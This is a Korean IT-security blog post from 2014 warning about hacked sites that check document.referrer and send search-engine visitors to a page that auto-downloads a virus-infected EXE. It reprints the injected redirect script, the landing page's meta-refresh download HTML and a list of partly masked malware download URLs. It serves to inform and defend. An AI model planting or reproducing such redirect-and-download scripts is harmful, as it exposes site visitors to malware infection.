본문 바로가기
IT 보안소식

[사이트 변조] Document.Referrer 함수를 이용한 악성코드 다운로드 방식 주의!!

by 잡다한 처리 2014. 6. 18.
반응형


기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.


그래서 이전에 기존 사이트 변조와는 다른 iframe 을 이용한 악성코드 다운로드 방식을 소개 한 적이 있었다.


이번에 발견 된 내용은 이와는 또 다른 방식으로 악성코드를 다운로드 시키고 있다.

실제로는 아주 옛날부터 사용해왔던 방식이지만, 최근 6월 11일 부터 우후죽순으로 발생하고 있어 주의가 필요하다.

(일명, 사이트 납치라고도 불리운다)


※ 참고사항 ※

- 현재까지 해당 스크립트로 연결 된 EXE URI

http://61.147.**.***:9098/xl.exe

http://pds25.egloos.com/pds/*****/**/**/ics.exe

http://61.147.**.***:9098/Tistory.exe

http://pds26.egloos.com/pds/*****/**/**/Tistory.exe

http://pds25.egloos.com/pds/*****/**/**/tistory.exe

http://pds27.egloos.com/pds/*****/**/**/DynaPass32.exe

http://pds25.egloos.com/pds/*****/**/**/story.exe

http://www.e-****.kr/Pds/*******/GroupIcon/snss.exe

http://61.147.**.****:8878/xldos.exe

http://1402850290.************.com/sink/jie_sink.exe

http://61.147.**.***:9898/ccy.exe

http://61.147.**.***:9898/story.exe

http://61.147.**.***:9898/Tistory.exe

http://115.68.**.**:9898/story.exe


※ 모두 Virut or Parite 바이러스에 감염 되어 있는 상태이다.



그럼 간단하게 이번 방식에 대해서 알아보자.


우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.

유포 사이트에는 아래와 같은 스크립트가 삽입되어 있다.

<script language="javascript" type="text/javascript">

var url = document.referrer;

if (url.indexOf("naver")>0){

window.location.href="http://farmerr.link"; 


}


if (url.indexOf("google")>0){

window.location.href="http://farmerr.link"; 

}


if (url.indexOf("daum")>0){

window.location.href="http://farmerr.link"; 

}

</script>


해당 스크립트의 내용은 아주 간단하다.

Document.Referrer 함수를 이용하여 naver, google, daum 을 통해 해당 사이트에 접속을 하였다면,

http://farmerr.link 사이트로 URL을 반환하는 기능을 하는 스크립트이다.


아마도 해당 블로그가 해킹되어 제작자가 임의로 스크립트를 넣어 둔 것으로 보인다.

Mass injection 같은 해킹방법은 아닌 것으로 판단된다.


그래서 실제 사이트를 직접방문할 경우에는 아무런 반응이 없지만,

검색을 통해 사이트에 접속 할 경우에는 상황이 다르다.

(※ 부득이 하게 사이트명은 모자이크!!)





그리고 반환 된 URL(http://farmerr.link)로 접속하면 아래와 같이 스크립트를 통해 exe를 다운로드 받을 수 있게 되어 있다.

<script>if(top!=self) top.location=this.location;</script>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=EUC-KR">

<title>여러분의 방문을 환영합니다.</title>

<meta http-equiv="refresh" content="0;url=http://61.147.**.***:9098/xl.exe">

</head>

</html>





해당 다운로드 된 xl.exe 파일Win32.Parite.B 로 감염이 되어 있으며, 

치료는 기본 백신에서도 가능하고 아래의 전용백신으로도 가능하다.



댓글